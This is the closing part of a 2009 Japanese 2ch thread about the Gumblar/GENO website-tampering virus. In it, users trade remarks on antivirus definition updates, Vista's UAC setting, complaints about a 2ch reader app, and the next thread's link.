952 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:13 ]
一回でもいいのでTVで報道してくれないものか

953 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:23 ]
>>947
スレ嫁よ
確認した奴が感染してないっていってるだろ

954 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:23 ]
>>947
してませんが

955 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:27 ]
>>936
ジョークなら良かったのにね
つかJaneの作者UAC切れとか言ってたんだ
気づかなかったけどVistaで普通に使えてたw
あー気づかなくて良かったあああ

956 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:29 ]
>>947
それデマ

957 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:31 ]
カスペ更新キタ

958 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:45 ]
先生ならあるいはまた日付だけの更新やもしれぬ・・・!

959 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:08 ]
お? ノートンまた更新キタのか
でも概略じゃ内容がサッパリわからないぜ

960 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:16 ]
先生更新きたけど、これ関連の更新なのかがわかんねぇw



961 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:28 ]
>>950
さっきの・・・?

962 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:33 ]
先生が真の力を発揮するのは再起動を要求する時だけ

963 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:33 ]
>>715
うしろ薄暗くなって許可かキャンセルかの警告出る。
ソフトによってはUACの所為で起動時糞重くなったり(韓国製FPSとかでよくある)するから切ってる奴多数

964 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:51:11 ]
そういえば感染するとうpだてがブロックされるとか何とかいってなかったっけ

965 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:51:37 ]
>>937
どうやらJaneStyleは設定ファイルの保存場所までProgramFilesの中でやっちゃって動作に仕様が出るらしい。
Vistaが出た当初から言われてんだが今日までずっと対策してない。
最近アップデートされたんだがやったのはアフィリンクとYahooツールバーの強制添付だけ。

966 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:51:57 ]
>>962
うん、Genoにまともに対応できるとしたらエンジンのアップデート必須
だろうね。

967 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:52:11 ]
>>910
アウアウだな

968 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:52:29 ]
>>963
それですか
じゃあうちのPCはオンになってるんですねUAC

969 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:52:52 ]
>>965
企業になったらやっぱりお金稼ぎがメインになるのね

970 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:52:56 ]
先生の普段のうpだてって何をしてるのか分からん



971 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:53:22 ]
企業まで感染するって
PCにセキュリティ対策ソフトって普通入れるもんじゃないの?

972 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:53:43 ]
Vistaの軽量化対策→UACをOFF

973 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:53:59 ]
>>970
ちゃんと使ってくれてるかの生存確認です
先生自体は死んだままだけどな!

974 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:10 ]
この流れ見てるとやっぱUACがデフォルトで有効だったのは大正解だと思うわ。

>>965
JaneStyleの開発力マジパネェ金の亡(ry

975 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:11 ]
とにかくGENOのやつらはマジで首吊れ!

976 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:17 ]
>>971
対策される前に入ったらアウトだろ。つまりそういうことだったんじゃね

977 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:25 ]
>>965
そうだったのか…
その発言今知った
知らなくてよかった

978 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:31 ]
>>971
このスレちゃんと読んだか?

979 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:46 ]
>>971
カカクコム事件とか知らないの? 馬鹿なの?

980 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:54:56 ]
普段見てるサイトが感染してたら終わりじゃんかよ



981 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:08 ]
誰か、次スレヨロシク
立てられなかった

982 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:31 ]
>>971
小さい企業だとパソコン買ったまま使い続けている場合も多いよ。
対策ソフトの期限切れアラートが出っ放しとかよくある。

983 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:35 ]
ウイルス対策ソフトが重いときの回避策でオフで切り抜けるってのも駄目だ

984 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:35 ]
avast入れてたら自前に対策できてただろうね

985 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:46 ]
とりあえず現在対応してるソフトまとめようず!

986 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:55:54 ]
ノートン定義ファイルのところに更新したってのってねえぞ。

987 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:04 ]
どうやってサイトが改ざんされるの?
FTPパス抜かれてうんぬん?

988 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:10 ]
バスター厨か?

989 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:17 ]
>>981
テンプレこのままでいいのかな?
それだったらこのまま立ててくるし

990 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:34 ]
Style使ってるけど、設定とか全部同じフォルダの中だぞ
古いアーカイブからうpして使ってるからかな

UACはNorton UAC Toolってのが使いやすいらしい



991 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:56:35 ]
>>971
まともな企業は導入しているソフトウェアのバージョンなども含めて、
セキュリティに十分な対策を講じていますが、問題はそのような企業が(ry

992 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:56:48 ]
>>987
そう

993 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:57:25 ]
>>910
995までに立たなかったら立ててくる

994 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:57:51 ]
>>951
最新の亜種に対策ってされたっけavast

995 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:57:51 ]
>>938
>>他の所にチェックを入れるウィルスの亜種
もうそんなものが・・・
nLiteでいろいろいじったXPのせいか
sqlsodbc.chmが最初から存在しないんだけど
安心はできないのね

996 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:57:57 ]
>>989
このスレの間では気になるところはチラホラとあったけど
基本的には特に変化は無かったはず
よろしく!

997 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:58:01 ]
先生目覚めてくれ・・・

998 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:58:05 ]
>>990
元々レジストリとか使わないから適当なフォルダに突っ込んでも問題無いんだよな
それをわざわざシステムフォルダへ入れようとするんだから頭悪い

999 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:58:20 ]
次スレ
GENOウイルススレ ★9
pc11.2ch.net/test/read.cgi/sec/1242489450/


1000 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:58:21 ]
1000ならネット壊滅



1001 名前:1001 [Over 1000 Thread]
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。






[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<196KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef